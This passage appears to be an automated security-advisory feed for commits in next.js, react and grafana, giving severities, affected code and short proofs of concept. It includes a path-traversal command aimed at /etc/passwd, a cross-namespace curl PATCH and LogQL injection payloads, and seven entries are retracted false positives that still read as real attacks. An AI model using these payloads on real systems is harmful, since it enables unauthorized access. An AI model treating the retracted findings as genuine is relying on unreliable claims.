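    return None if b == 0 else a // b

assert checked_div(1024, 4) == 256
assert checked_div(1024, 0) is None  # a zero max_chunk_count_per_group no longer panics
```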

⚠️ MEDIUM UNVERIFIED Integer Overflow / Denial of Service

Feb 9, 2026, 10:38 PM — vercel/next.js

Commit: 9a2113c

Author: Luke Sandberg

The code incorrectly used max() instead of min() to clamp worker counts, causing all systems to be treated as having 64+ cores and potentially overflowing usize on systems with many actual cores. This could lead to memory exhaustion or application crashes.

🔍 View Affected Code & PoC

Affected Code

let num_workers = num_workers.max(64);
(num_workers * num_workers * 16).next_power_of_two()

Proof of Concept

On a system with a large number of cores (e.g., 10000), the calculation becomes (10000 * 10000 * 16).next_power_of_two() = 1,600,000,000.next_power_of_two() = 2,147,483,648 (2^31). With somewhat more cores the multiplication itself overflows usize on 32-bit targets, and even without overflow the result drives massive memory allocation attempts, leading to DoS.
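The min-vs-max difference is easy to check numerically; next_power_of_two is reimplemented here for illustration, and the capacity formula follows the snippet above:

```python
def next_power_of_two(x):
    return 1 << (x - 1).bit_length()

def pre_patch_capacity(num_workers):
    n = max(num_workers, 64)  # bug: a floor of 64, not a ceiling
    return next_power_of_two(n * n * 16)

def post_patch_capacity(num_workers):
    n = min(num_workers, 64)  # fix: clamp the worker count at 64
    return next_power_of_two(n * n * 16)

assert pre_patch_capacity(4) == 65536       # a 4-core box sized as if 64-core
assert post_patch_capacity(4) == 256
assert pre_patch_capacity(10_000) == 2**31  # 1.6e9 rounds up to 2,147,483,648
```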

⚠️ MEDIUM CONFIRMED Path Traversal

Feb 4, 2026, 03:12 AM — facebook/react

Commit: 3ce1316

Author: Joseph Savona

The code had improper path resolution that allowed attackers to access files outside the intended directory structure. The patch fixes relative path resolution by properly normalizing paths relative to PROJECT_ROOT instead of allowing arbitrary relative paths from the current working directory.

🔍 View Affected Code & PoC

Affected Code

const inputPath = path.isAbsolute(opts.path)
  ? opts.path
  : path.resolve(process.cwd(), opts.path);

Proof of Concept

yarn snap compile ../../../etc/passwd

⚠️ MEDIUM UNVERIFIED Denial of Service (Stack Overflow)

Feb 4, 2026, 06:43 PM — facebook/react

Commit: cf993fb

Author: Hendrik Liebau

The recursive traversal of async node chains in visitAsyncNode causes stack overflow when processing deep async sequences. Database libraries creating long linear chains of async operations can trigger this DoS condition. The patch converts recursive traversal to iterative to prevent stack exhaustion.

🔍 View Affected Code & PoC

Affected Code

function visitAsyncNode(...) {
  if (visited.has(node)) {
    return visited.get(node);
  }
  visited.set(node, null);
  const result = visitAsyncNodeImpl(request, task, node, visited, cutOff);

Proof of Concept

// Create a deep chain of async sequences (10000+ levels)
let current = null;
for (let i = 0; i < 10000; i++) {
  current = { previous: current, end: -1 };
}
// This deep chain will cause stack overflow in visitAsyncNode
// when React Flight processes the async node traversal
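The conversion can be demonstrated on exactly such a 10,000-deep chain; Python stands in here for the React Flight JavaScript, with the same recursive-vs-iterative contrast:

```python
def depth_recursive(node):
    # Pre-patch shape: one stack frame per chain link.
    return 0 if node is None else 1 + depth_recursive(node["previous"])

def depth_iterative(node):
    # Post-patch shape: a loop with constant stack depth.
    depth = 0
    while node is not None:
        depth += 1
        node = node["previous"]
    return depth

# Build a chain deeper than Python's default recursion limit (~1000 frames).
chain = None
for _ in range(10_000):
    chain = {"previous": chain, "end": -1}

assert depth_iterative(chain) == 10_000  # the loop handles it fine
try:
    depth_recursive(chain)
    raise AssertionError("unreachable")
except RecursionError:
    pass  # the pre-patch failure mode
```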

⚠️ MEDIUM UNVERIFIED Denial of Service

Feb 8, 2026, 07:14 PM — facebook/react

Commit: 2dd9b7c

Author: Jimmy Lai

The code incorrectly checked for debugChannel existence instead of debugChannelReadable, causing the server to signal debug info availability even with write-only channels. This could cause clients to block indefinitely waiting for debug data that never arrives, resulting in a denial of service condition.

🔍 View Affected Code & PoC

Affected Code

debugChannel !== undefined,

Proof of Concept

// Server-side: Pass a write-only debug channel (no readable side)
const { Writable } = require('stream');
const writeOnlyChannel = new Writable({ write() {} });
renderToPipeableStream(component, { debugChannel: writeOnlyChannel });
// Client will now block forever waiting for debug data that cannot be read
❌ Corrections & Retractions (7)

⚠️ MEDIUM FALSE POSITIVE Path Traversal

Commit: 193f6f1

Author: Costa Alexoglou

The script used relative paths without proper directory resolution, allowing an attacker to execute the script from a different working directory and cause certificates to be written to unintended locations. This could lead to certificate files being created in arbitrary directories or overwriting existing files.

🔍 View Affected Code & PoC

Affected Code

rm -rf data/grafana-aggregator
mkdir -p data/grafana-aggregator
openssl req -nodes -new -x509 -keyout data/grafana-aggregator/ca.key

Proof of Concept

cd /tmp && /path/to/grafana/hack/make-aggregator-pki.sh - This would create certificates in /tmp/data/grafana-aggregator/ instead of the intended repo location, potentially overwriting files or bypassing access controls in the /tmp directory.

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: aac8061

Author: Tania

The code was performing namespace validation for all provider types, but the static provider (which serves local configuration) should not enforce namespace restrictions. This created an authorization bypass where users could access feature flags from other organizations by using the static provider endpoint with mismatched namespaces.

🔍 View Affected Code & PoC

Affected Code

valid, ns := b.validateNamespace(r)
if !valid {
	http.Error(w, namespaceMismatchMsg, http.StatusUnauthorized)
	return
}

Proof of Concept

An attacker authenticated to org-1 could access feature flags intended for org-2 by making requests to the static provider endpoints (when providerType is not FeaturesServiceProviderType or OFREPProviderType) with org-2's namespace in the URL path, bypassing the namespace validation that should prevent cross-organization access.

⚠️ MEDIUM FALSE POSITIVE State Modification via Dry-Run Bypass

Commit: ccaf868

Author: Igor Suleymanov

The dual-writer storage system was not properly handling dry-run operations, allowing state modifications and side effects (like permission changes) to occur when they should only validate without making changes. This violates the dry-run contract where operations must be read-only.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no dry-run check in Create method
func (d *dualWriter) Create(ctx context.Context, in runtime.Object, createValidation rest.ValidateObjectFunc, options *metav1.CreateOptions) (runtime.Object, error) {
    // ... proceeds to modify both legacy and unified storage even during dry-run

Proof of Concept

POST /api/v1/folders
Content-Type: application/json
Dry-Run: All

{"metadata":{"name":"test-folder"},"spec":{"title":"Test Folder"}}

# Before patch: This would create actual folder and modify permissions despite dry-run flag
# After patch: This only validates without side effects

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: eda64c6

Author: Costa Alexoglou

The code incorrectly assigned key functions for namespaced and cluster-scoped resources, causing namespaced resources to use cluster-scoped key functions and vice versa. This could allow unauthorized access to resources across namespace boundaries by manipulating resource keys.

🔍 View Affected Code & PoC

Affected Code

if isNamespaced {
    statusStore.Store.KeyFunc = grafanaregistry.NamespaceKeyFunc(gr)
    statusStore.Store.KeyRootFunc = grafanaregistry.KeyRootFunc(gr)
} else {
    statusStore.Store.KeyFunc = grafanaregistry.ClusterScopedKeyFunc(gr)

Proof of Concept

curl -X PATCH 'http://localhost:3000/apis/advisor.grafana.app/v0alpha1/namespaces/admin-namespace/checks/sensitive-check/status' -H 'Content-Type: application/json-patch+json' -u 'low-priv-user:password' -d '[{"op": "replace", "path": "/status", "value": {"compromised": true}}]' - This would allow a low-privileged user to modify status of resources in other namespaces due to incorrect key function assignment.

⚠️ MEDIUM FALSE POSITIVE Query Injection

Commit: 9be63b1

Author: Steve Simpson

The code added validation for alert label matchers to prevent query injection in LogQL queries. Before the patch, malicious label names or matcher types could be injected into the LogQL query string without proper validation, potentially allowing attackers to manipulate the query structure.

🔍 View Affected Code & PoC

Affected Code

logql += fmt.Sprintf(` | alert_labels_%s %s %q`, matcher.Label, matcher.Type, matcher.Value)

Proof of Concept

POST request with Labels: [{"Type": "| json | drop", "Label": "severity", "Value": "critical"}] or Labels: [{"Type": "=", "Label": "test\" = \"injected\"", "Value": "value"}] to inject arbitrary LogQL operators and manipulate the query structure

⚠️ MEDIUM FALSE POSITIVE Information Disclosure

Commit: 14ee584

Author: Tom Ratcliffe

The code previously only allowed admin users to see team folder owners, but the patch changes this to allow any user with 'teams:read' permission to see folder owners. This creates an information disclosure vulnerability where users with lower privileges can access team ownership information they shouldn't be able to see.

🔍 View Affected Code & PoC

Affected Code

const isAdmin = contextSrv.hasRole('Admin') || contextSrv.isGrafanaAdmin;
{isAdmin && config.featureToggles.teamFolders && folderDTO && 'ownerReferences' in folderDTO && (
  <FolderOwners ownerReferences={folderDTO.ownerReferences} />
)}

Proof of Concept

1. Create a user account without admin privileges but with 'teams:read' permission
2. Navigate to a team folder that has owner references
3. Before patch: Owner information is hidden
4. After patch: Owner information is now visible, disclosing team membership and folder ownership data that was previously restricted to admins only

⚠️ MEDIUM FALSE POSITIVE Race Condition / Optimistic Locking Bypass

Commit: 57b75b4

Author: Will Assis

The code had a race condition in optimistic locking implementation where concurrent operations could bypass resource version checks. The original implementation would rollback changes after transaction commit, creating a window where conflicting writes could succeed simultaneously. The patch fixes this by performing conflict detection during the transaction using proper WHERE clauses with resource version constraints.

🔍 View Affected Code & PoC

Affected Code

DELETE FROM resource
WHERE group = ? AND resource = ? AND namespace = ? AND name = ?;
-- Missing resource_version check in WHERE clause

Proof of Concept

1. Client A reads resource with RV=100
2. Client B reads same resource with RV=100
3. Client A updates resource (RV becomes 101)
4. Client B deletes resource using old RV=100
5. Both operations succeed due to missing RV constraint in DELETE/UPDATE queries, allowing Client B to delete a resource that was modified after they read it, violating optimistic concurrency control